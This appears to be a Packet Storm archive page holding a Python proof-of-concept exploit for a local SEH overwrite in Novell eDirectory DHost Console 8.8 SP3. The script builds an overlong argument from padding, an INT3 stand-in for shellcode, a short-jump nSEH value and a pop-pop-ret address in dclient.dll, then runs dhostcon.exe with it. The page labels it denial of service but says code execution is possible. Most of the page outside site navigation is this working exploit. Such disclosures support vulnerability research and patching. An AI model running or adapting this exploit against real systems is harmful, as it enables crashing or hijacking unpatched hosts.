exploit the possibilities

Novell eDirectory DHost Console 8.8 SP3 SEH Overwrite

Novell eDirectory DHost Console 8.8 SP3 SEH Overwrite
Posted Oct 17, 2010
Authored by d0lc3

Novell eDirectory DHost Console version 8.8 SP3 SEH overwrite denial of service exploit.

tags | exploit, denial of service
MD5 | a9db2612e917d0696e56026f0887dc14

Novell eDirectory DHost Console 8.8 SP3 SEH Overwrite

Change Mirror Download
# Exploit Title:    Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date: 17/10/2010
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.novell.com/
# Version: 8.8 SP3 (20216.67)]
# Tested on: win32 xp sp3 (spa)

#Summary:
# DHostCon.exe is prone to local denial of service caused by stack overflow
# triggered if user-supplied parameters are too long (1074 bytes).
# Due nature of this vulnerabilty, attackers could exploit this issue
# to execute arbitrary code on local host.

#PoC:

#!/usr/bin/python
import os,struct

def main():
path="C:\Novell\NDS\dhostcon.exe"
args="x.x.x.x" #ip server
buf="A"*1065
nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP
seh=struct.pack("<L",0x61012c20) #PPR dclient.dll

shellcode=struct.pack("<B",0xCC) #INT3

crash=buf+shellcode+nseh+seh

os.system(path+" "+args+" "+crash) #Crash!

if __name__=="__main__":
main()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close